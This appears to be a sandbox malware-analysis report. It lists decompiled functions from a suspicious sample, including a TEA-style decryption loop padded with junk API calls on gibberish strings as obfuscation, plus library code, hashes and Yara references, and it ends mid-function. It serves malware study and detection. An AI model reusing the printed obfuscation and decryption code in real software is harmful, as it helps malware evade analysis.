Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 84e9507500bd8bc97996938881ce7e64a8e91b23de40b665da7fa5fc8c57c766
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 36C1AF73D0AAF34A8735892D40581ABEE626FD178131FC3E29CD42F389D62A9E8195D4

Uniqueness

Uniqueness Score: -1.00%

Function 021B0042 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254132135.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21b0000_P2SMn3jloH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 18d234146561140c2e84b24ac3242f29fb8aecdc6f0a47e1c489afb6c809434c
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 56115A72380200AFEB54DE65DC90EA773AAEF8C3A0B198165E908CB311D776E841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040501B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040501B(unsigned int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				long _v40;
				long _v44;
				long _v48;
				long _v52;
				long _v56;
				long _v60;
				char _v1084;
				char _v2108;
				char _v3132;
				void _v5180;
				intOrPtr* _t58;
				unsigned int _t75;
				unsigned int* _t93;
				unsigned int _t94;
				unsigned int _t101;
				signed int _t104;
				signed int _t105;
				signed int _t107;

				E004084E0(0x1438);
				_t93 = _a4;
				_t94 =  *_t93;
				_v12 = _t93[1];
				_t58 = _a8;
				_v36 =  *_t58;
				_v28 =  *((intOrPtr*)(_t58 + 4));
				_a4 = _t94;
				_v16 = 0xc6ef3720;
				_v32 =  *((intOrPtr*)(_t58 + 8));
				_v24 =  *((intOrPtr*)(_t58 + 0xc));
				_v20 = 0x20;
				while(1) {
					_t104 = _t94 << 4;
					if( *0x588f80 == 5) {
						__imp__GetConsoleAliasExesLengthW();
						_t94 = _a4;
					}
					_t105 = _t104 + _v32;
					_t61 = _v16 + _t94;
					_a8 = _v16 + _t94;
					_v8 = _t94 >> 5;
					if( *0x588f80 == 0x1b) {
						CopyFileExA("Viwexisohoxopuv jozux", "Hokijifuyoh", 0, 0, 0, 0);
						GetTickCount();
						InterlockedExchange( &_v40, 0);
						LocalSize(0);
						_t61 = _a8;
					}
					_v8 = _v8 + _v24;
					 *0x583900 = 0;
					E00404FC5(_v24,  &_v8, _t61 ^ _t105);
					E00404FA7( &_v12, _v8);
					_t107 = _v12 << 4;
					if( *0x588f80 == 0x78c) {
						GetComputerNameA( &_v1084,  &_v48);
						GetVolumeInformationA("vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu",  &_v2108, 0,  &_v52,  &_v56,  &_v60,  &_v3132, 0);
						WriteConsoleW(0,  &_v5180, 0,  &_v44, 0);
					}
					_a8 = _v12 + _v16;
					_t101 = _v12;
					 *0x58390c =  *0x58390c | 0xffffffff;
					 *0x583908 = 0xff6b3619;
					_v8 = _t107 + _v36 ^ (_t101 >> 0x00000005) + _v28 ^ _a8;
					_a4 = _a4 - _v8;
					E00404F98( &_v16, 0x9e3779b9);
					_t51 =  &_v20;
					 *_t51 = _v20 - 1;
					if( *_t51 == 0) {
						break;
					}
					_t94 = _a4;
				}
				_t75 = _a4;
				 *_t93 = _t75;
				_t93[1] = _t101;
				return _t75;
			}

0x00405023
0x00405029
0x0040502f
0x00405031
0x00405034
0x00405039
0x0040503f
0x0040504a
0x0040504d
0x00405054
0x00405057
0x0040505a
0x00405068
0x0040506a
0x00405074
0x00405076
0x0040507c
0x0040507c
0x00405082
0x00405085
0x00405091
0x00405094
0x00405097
0x004050a7
0x004050ad
0x004050b8
0x004050bf
0x004050c5
0x004050c5
0x004050cb
0x004050d5
0x004050db
0x004050e7
0x004050ef
0x004050fc
0x00405109
0x00405130
0x00405144
0x00405144
0x00405150
0x00405153
0x00405159
0x0040516f
0x00405179
0x0040517f
0x0040518b
0x00405190
0x00405190
0x00405193
0x00000000
0x00000000
0x00405065
0x00405065
0x00405199
0x0040519e
0x004051a0
0x004051a5

APIs

GetConsoleAliasExesLengthW.KERNEL32 ref: 00405076
CopyFileExA.KERNEL32(Viwexisohoxopuv jozux,Hokijifuyoh,00000000,00000000,00000000,00000000), ref: 004050A7
GetTickCount.KERNEL32 ref: 004050AD
InterlockedExchange.KERNEL32(?,00000000), ref: 004050B8
LocalSize.KERNEL32 ref: 004050BF
GetComputerNameA.KERNEL32 ref: 00405109
GetVolumeInformationA.KERNEL32(vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu,?,00000000,?,?,?,?,00000000), ref: 00405130
WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00405144

Strings

Hokijifuyoh, xrefs: 0040509D
vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu, xrefs: 0040512B
Viwexisohoxopuv jozux, xrefs: 004050A2
, xrefs: 0040505A

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: Console$AliasComputerCopyCountExchangeExesFileInformationInterlockedLengthLocalNameSizeTickVolumeWrite
String ID: $Hokijifuyoh$Viwexisohoxopuv jozux$vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu
API String ID: 939497775-455562230
Opcode ID: 1bb6bf6314f06e2873a4e0539b91dd9216eac1220940048cc4abfced84b90cc6
Instruction ID: 84b030e137c9a744ec4aa380a50967c3a34b582b4051fd5b8d58020ad60af0e2
Opcode Fuzzy Hash: 1bb6bf6314f06e2873a4e0539b91dd9216eac1220940048cc4abfced84b90cc6
Instruction Fuzzy Hash: 1A51F676900218EFCB10DF99D9849DEBBB8FF88310B10816AF915F7260D734AA44DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040501A Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040501A(void* __edx, unsigned int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				long _v40;
				long _v44;
				long _v48;
				long _v52;
				long _v56;
				long _v60;
				intOrPtr _v117;
				char _v1084;
				char _v2108;
				char _v3132;
				void _v5180;
				intOrPtr* _t60;
				unsigned int _t77;
				unsigned int* _t96;
				unsigned int _t98;
				unsigned int _t106;
				signed int _t112;
				signed int _t113;
				signed int _t115;

				_v117 = _v117 + __edx;
				E004084E0(0x1438);
				_t96 = _a4;
				_t98 =  *_t96;
				_v12 = _t96[1];
				_t60 = _a8;
				_v36 =  *_t60;
				_v28 =  *((intOrPtr*)(_t60 + 4));
				_a4 = _t98;
				_v16 = 0xc6ef3720;
				_v32 =  *((intOrPtr*)(_t60 + 8));
				_v24 =  *((intOrPtr*)(_t60 + 0xc));
				_v20 = 0x20;
				while(1) {
					_t112 = _t98 << 4;
					if( *0x588f80 == 5) {
						__imp__GetConsoleAliasExesLengthW();
						_t98 = _a4;
					}
					_t113 = _t112 + _v32;
					_t63 = _v16 + _t98;
					_a8 = _v16 + _t98;
					_v8 = _t98 >> 5;
					if( *0x588f80 == 0x1b) {
						CopyFileExA("Viwexisohoxopuv jozux", "Hokijifuyoh", 0, 0, 0, 0);
						GetTickCount();
						InterlockedExchange( &_v40, 0);
						LocalSize(0);
						_t63 = _a8;
					}
					_v8 = _v8 + _v24;
					 *0x583900 = 0;
					E00404FC5(_v24,  &_v8, _t63 ^ _t113);
					E00404FA7( &_v12, _v8);
					_t115 = _v12 << 4;
					if( *0x588f80 == 0x78c) {
						GetComputerNameA( &_v1084,  &_v48);
						GetVolumeInformationA("vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu",  &_v2108, 0,  &_v52,  &_v56,  &_v60,  &_v3132, 0);
						WriteConsoleW(0,  &_v5180, 0,  &_v44, 0);
					}
					_a8 = _v12 + _v16;
					_t106 = _v12;
					 *0x58390c =  *0x58390c | 0xffffffff;
					 *0x583908 = 0xff6b3619;
					_v8 = _t115 + _v36 ^ (_t106 >> 0x00000005) + _v28 ^ _a8;
					_a4 = _a4 - _v8;
					E00404F98( &_v16, 0x9e3779b9);
					_t53 =  &_v20;
					 *_t53 = _v20 - 1;
					if( *_t53 != 0) {
						_t98 = _a4;
						continue;
					}
					_t77 = _a4;
					 *_t96 = _t77;
					_t96[1] = _t106;
					return _t77;
				}
			}

0x0040501a
0x00405023
0x00405029
0x0040502f
0x00405031
0x00405034
0x00405039
0x0040503f
0x0040504a
0x0040504d
0x00405054
0x00405057
0x0040505a
0x00405068
0x0040506a
0x00405074
0x00405076
0x0040507c
0x0040507c
0x00405082
0x00405085
0x00405091
0x00405094
0x00405097
0x004050a7
0x004050ad
0x004050b8
0x004050bf
0x004050c5
0x004050c5
0x004050cb
0x004050d5
0x004050db
0x004050e7
0x004050ef
0x004050fc
0x00405109
0x00405130
0x00405144
0x00405144
0x00405150
0x00405153
0x00405159
0x0040516f
0x00405179
0x0040517f
0x0040518b
0x00405190
0x00405190
0x00405193
0x00405065
0x00000000
0x00405065
0x00405199
0x0040519e
0x004051a0
0x004051a5
0x004051a5

APIs

GetConsoleAliasExesLengthW.KERNEL32 ref: 00405076
CopyFileExA.KERNEL32(Viwexisohoxopuv jozux,Hokijifuyoh,00000000,00000000,00000000,00000000), ref: 004050A7
GetTickCount.KERNEL32 ref: 004050AD
InterlockedExchange.KERNEL32(?,00000000), ref: 004050B8
LocalSize.KERNEL32 ref: 004050BF
GetComputerNameA.KERNEL32 ref: 00405109
GetVolumeInformationA.KERNEL32(vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu,?,00000000,?,?,?,?,00000000), ref: 00405130
WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00405144

Strings

Hokijifuyoh, xrefs: 0040509D
vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu, xrefs: 0040512B
Viwexisohoxopuv jozux, xrefs: 004050A2
, xrefs: 0040505A

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: Console$AliasComputerCopyCountExchangeExesFileInformationInterlockedLengthLocalNameSizeTickVolumeWrite
String ID: $Hokijifuyoh$Viwexisohoxopuv jozux$vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu
API String ID: 939497775-455562230
Opcode ID: 76d2e514d146a04c526660f1a1346bda9669b2d8e2a44e6e8d8f8a859ef879cf
Instruction ID: b458645b5a5c2dc041ceb989f8648661d7a1c80406c0133357f5a6f26ebf32f6
Opcode Fuzzy Hash: 76d2e514d146a04c526660f1a1346bda9669b2d8e2a44e6e8d8f8a859ef879cf
Instruction Fuzzy Hash: 0E51F676900218EFCB10DF99D9849DEBBB8FF89310B10816AF915F7260D734AA44DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD43 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E0040DD43(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x41e4d0);
				E0040EF38(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0040F431(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x403010;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x430cd0;
				E0040E43F(_t35, 1, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E0040DE18();
				E0040E43F(_t35, 1, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x4312d8; // 0x431200
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E0040A5E0( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0040EF7D(E0040DE21());
			}

0x0040dd43
0x0040dd43
0x0040dd45
0x0040dd4a
0x0040dd4f
0x0040dd55
0x0040dd5d
0x0040dd60
0x0040dd65
0x0040dd66
0x0040dd69
0x0040dd6c
0x0040dd76
0x0040dd7b
0x0040dd83
0x0040dd8b
0x0040dd9b
0x0040dd9b
0x0040dda1
0x0040dda4
0x0040ddab
0x0040ddb2
0x0040ddbb
0x0040ddc1
0x0040ddc8
0x0040ddce
0x0040ddd5
0x0040dddc
0x0040dde2
0x0040dde5
0x0040dde8
0x0040dded
0x0040ddef
0x0040ddf4
0x0040ddf4
0x0040ddfa
0x0040de00
0x0040de11

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041E4D0,0000000C,0040DE7E,00000000,00000000,?,?,0040B791,0040B5BF,00000001,?,0040807B,00000001,?), ref: 0040DD55
__crt_waiting_on_module_handle.LIBCMT ref: 0040DD60

Part of subcall function 0040F431: Sleep.KERNEL32(000003E8,?,?,0040DCA6,KERNEL32.DLL,?,0040E27B,?,0040B5B9,?,00000001,?,0040807B,00000001,?), ref: 0040F43D
Part of subcall function 0040F431: GetModuleHandleW.KERNEL32(?,?,?,0040DCA6,KERNEL32.DLL,?,0040E27B,?,0040B5B9,?,00000001,?,0040807B,00000001,?), ref: 0040F446

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040DD89
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040DD99
__lock.LIBCMT ref: 0040DDBB
InterlockedIncrement.KERNEL32(00430CD0), ref: 0040DDC8
__lock.LIBCMT ref: 0040DDDC
___addlocaleref.LIBCMT ref: 0040DDFA

Strings

EncodePointer, xrefs: 0040DD7D
DecodePointer, xrefs: 0040DD91
KERNEL32.DLL, xrefs: 0040DD4F, 0040DD54, 0040DD5F

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 7a28d9df0d79a8e46aaea5635bab356b9422339ca1f83094fd59ec47a5d99364
Instruction ID: 9cbef10d2a4af3273987d8409bbbf66332b745a71d92fbc2e00b1abfa944f32f
Opcode Fuzzy Hash: 7a28d9df0d79a8e46aaea5635bab356b9422339ca1f83094fd59ec47a5d99364
Instruction Fuzzy Hash: 1E117571900701AFD720AF76D905B9ABBE0AF04318F10853FE495B76E1CB7899458B5C

Uniqueness

Uniqueness Score: -1.00%

Function 004071C1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004071C1(void* __eflags) {
				intOrPtr _t40;
				intOrPtr _t43;
				void* _t45;

				E004088F4(E0041BA17, _t45);
				E004078F4(_t45 - 0x14, 0);
				_t43 =  *0x588f88;
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				 *((intOrPtr*)(_t45 - 0x10)) = _t43;
				_t40 = E00404E01( *((intOrPtr*)(_t45 + 8)), E00404CFA(0x589004));
				if(_t40 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t45 + 8)));
						_push(_t45 - 0x10);
						if(E0040700B() == 0xffffffff) {
							E00408143(_t45 - 0x20, "bad cast");
							E00408993(_t45 - 0x20, 0x41df20);
						}
						_t40 =  *((intOrPtr*)(_t45 - 0x10));
						 *0x588f88 = _t40;
						E00404D2F(_t40);
						E00404D92();
					} else {
						_t40 = _t43;
					}
				}
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				E0040791C(_t45 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t40;
			}

0x004071c6
0x004071d5
0x004071da
0x004071e0
0x004071e9
0x004071fa
0x004071fe
0x00407202
0x00407208
0x0040720e
0x00407219
0x00407223
0x00407231
0x00407231
0x00407236
0x0040723b
0x00407241
0x00407248
0x00407204
0x00407204
0x00407204
0x00407202
0x0040724d
0x00407254
0x00407260
0x00407268

APIs

__EH_prolog.LIBCMT ref: 004071C6
std::_Lockit::_Lockit.LIBCPMT ref: 004071D5
int.LIBCPMT ref: 004071EC

Part of subcall function 00404CFA: std::_Lockit::_Lockit.LIBCPMT ref: 00404D0B

std::bad_exception::bad_exception.LIBCMT ref: 00407223
__CxxThrowException@8.LIBCMT ref: 00407231
std::locale::facet::_Incref.LIBCPMT ref: 00407241

Strings

bad cast, xrefs: 0040721B

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8H_prologIncrefThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2140829718-3145022300
Opcode ID: ddbadce34899ec9c52f17dabb64b652c7e92ee8fd94eb73b687b0beb61dc9c4f
Instruction ID: f94f7b4a95d8708b41945feee4cca53b4db56b23a313fed7911fafdba3c045d2
Opcode Fuzzy Hash: ddbadce34899ec9c52f17dabb64b652c7e92ee8fd94eb73b687b0beb61dc9c4f
Instruction Fuzzy Hash: C2119172E0011497CB15EB65C812ABEB735AF80328F54053FF521772D1DF38AA05D799

Uniqueness

Uniqueness Score: -1.00%

Function 00407288 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00407288(void* __ecx, void* __edi) {
				signed int _t25;
				void* _t29;
				signed char _t38;
				void* _t43;
				void* _t44;

				_t43 = __edi;
				E004088F4(E0041BA39, _t44);
				_t25 =  *(_t44 + 8) & 0x00000017;
				 *(__ecx + 8) = _t25;
				_t38 =  *(__ecx + 0xc) & _t25;
				if(_t38 != 0) {
					if( *((intOrPtr*)(_t44 + 0xc)) == 0) {
						L4:
						if((_t38 & 0x00000004) == 0) {
							_push(2);
							_pop(0);
							if((0 & _t38) == 0) {
								E004070F9(_t44 - 0x6c, _t43, "ios_base::eofbit set");
								_t38 = _t44 - 0x94;
								 *((intOrPtr*)(_t44 - 4)) = 0;
								E004070B4(_t38, _t44 - 0x6c);
								_push(0x41df84);
								_t29 = _t44 - 0x94;
								L7:
								_push(_t29);
								L3:
								E00408993();
								goto L4;
							}
							E004070F9(_t44 - 0x28, _t43, "ios_base::failbit set");
							 *((intOrPtr*)(_t44 - 4)) = 1;
							L6:
							_t38 = _t44 - 0x50;
							E004070B4(_t38, _t44 - 0x28);
							_push(0x41df84);
							_t29 = _t44 - 0x50;
							goto L7;
						}
						E004070F9(_t44 - 0x28, _t43, "ios_base::badbit set");
						 *((intOrPtr*)(_t44 - 4)) = 0;
						goto L6;
					}
					_push(0);
					_push(0);
					goto L3;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return _t25;
			}

0x00407288
0x0040728d
0x00407295
0x00407298
0x004072a4
0x004072a6
0x004072b1
0x004072ba
0x004072bd
0x004072e6
0x004072e8
0x004072eb
0x0040730b
0x00407314
0x0040731a
0x0040731d
0x00407322
0x00407327
0x004072e3
0x004072e3
0x004072b5
0x004072b5
0x00000000
0x004072b5
0x004072f5
0x004072fa
0x004072cf
0x004072d3
0x004072d6
0x004072db
0x004072e0
0x00000000
0x004072e0
0x004072c7
0x004072cc
0x00000000
0x004072cc
0x004072b3
0x004072b4
0x00000000
0x004072b4
0x00407332
0x0040733a

APIs

__EH_prolog.LIBCMT ref: 0040728D
__CxxThrowException@8.LIBCMT ref: 004072B5
std::bad_exception::bad_exception.LIBCMT ref: 004072D6
std::bad_exception::bad_exception.LIBCMT ref: 0040731D

Strings

ios_base::failbit set, xrefs: 004072ED
ios_base::eofbit set, xrefs: 00407303
ios_base::badbit set, xrefs: 004072BF

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: std::bad_exception::bad_exception$Exception@8H_prologThrow
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 965843388-1866435925
Opcode ID: 1f9409369e8275f9faae0972c405873c5af8ee8627cb4b720766c5d04627b7a8
Instruction ID: 97ee43fe21d49277692d76a3ac49be31411882ee5d05a5a9bf490be4ce5210e1
Opcode Fuzzy Hash: 1f9409369e8275f9faae0972c405873c5af8ee8627cb4b720766c5d04627b7a8
Instruction Fuzzy Hash: AF115171D48248AAC714EFA4C992FEDB774AB10308F14807FA5067B1C2DB7C6A49DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 004051A8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004051A8(unsigned int _a4, unsigned int _a8, signed int _a12) {
				unsigned int _t5;
				void* _t6;
				unsigned int _t11;
				unsigned int _t14;

				if( *0x588f80 == 0x516) {
					__imp__MoveFileWithProgressA("lowahopaxepo", "cufahowir", 0, 0, 0);
				}
				_t5 = _a8 >> 3;
				if(_t5 > 0) {
					_t14 = _a4;
					_t11 = _t5;
					do {
						if( *0x588f80 == 0xb7d) {
							CopyFileExA(0, 0, 0, 0, 0, 0);
						}
						if( *0x588f80 == 0x1c) {
							TlsGetValue(0);
							EnumSystemCodePagesA(0, 0);
						}
						_t6 = E0040501B(_t14, _a12);
						_t14 = _t14 + 8;
						_t11 = _t11 - 1;
					} while (_t11 != 0);
					return _t6;
				}
				return _t5;
			}

0x004051b8
0x004051c7
0x004051c7
0x004051d0
0x004051d5
0x004051d9
0x004051dc
0x004051de
0x004051e8
0x004051f0
0x004051f0
0x004051fd
0x00405200
0x00405208
0x00405208
0x00405212
0x00405217
0x0040521a
0x0040521a
0x00000000
0x0040521e
0x00405221

APIs

MoveFileWithProgressA.KERNEL32 ref: 004051C7
CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004051F0
TlsGetValue.KERNEL32(00000000), ref: 00405200
EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 00405208

Strings

lowahopaxepo, xrefs: 004051C2
cufahowir, xrefs: 004051BD

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: File$CodeCopyEnumMovePagesProgressSystemValueWith
String ID: cufahowir$lowahopaxepo
API String ID: 1094414278-940798668
Opcode ID: 6980798557b2102f562a45582d2b0bdc7ffbd34901eda9920b71f48b31dee8aa
Instruction ID: edb5c119685e2f8bf480780b49142d10d3bd3aaeb667a99e0e25aafd651fd6e9
Opcode Fuzzy Hash: 6980798557b2102f562a45582d2b0bdc7ffbd34901eda9920b71f48b31dee8aa
Instruction Fuzzy Hash: 51F0C831901528B7D7205F519D08D9F7B6CFF993A57400136FA04B15A0C7384481DFBC

Uniqueness

Uniqueness Score: -1.00%

Function 0040D283 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040D283(intOrPtr __ecx) {
				void* _t47;
				intOrPtr _t48;
				void* _t53;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_push(0x2c);
				_push(0x41e430);
				E0040EF38(_t47, _t54, _t56);
				_t48 = __ecx;
